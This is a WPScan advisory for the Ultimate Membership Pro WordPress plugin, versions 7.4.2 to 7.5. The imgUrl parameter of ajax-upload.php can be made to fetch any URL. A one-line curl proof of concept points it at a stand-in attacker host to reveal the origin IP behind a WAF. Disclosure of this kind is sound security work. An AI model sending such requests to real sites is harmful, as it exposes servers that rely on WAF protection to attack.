WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ultimate Membership Pro 7.4.2 <= 7.5 - Arbitrary media include

Description

In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it's available on (7.4.2+ at least) to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the origin even when the site is behind a third party WAF such as Fastly, Cloudflare, Sucuri, etc:

Proof of Concept

curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

Affects Plugins

indeed-membership-pro
Fixed in version 7.6

References

URL
https://codecanyon.net/comments/21539595
URL
https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253

Classification

Type

UNKNOWN

Miscellaneous

Original Researcher

James Fraser

Submitter

fwaggle

Submitter twitter
fwaggle
Verified

No

WPVDB ID
f422a274-6f9e-4a20-9759-f3bb5ad972d6

Timeline

Publicly Published

2019-02-26 (about 4 years ago)

Added

2019-05-27 (about 4 years ago)

Last Updated

2020-02-07 (about 3 years ago)

Our Other Services

WPScan WordPress Security Plugin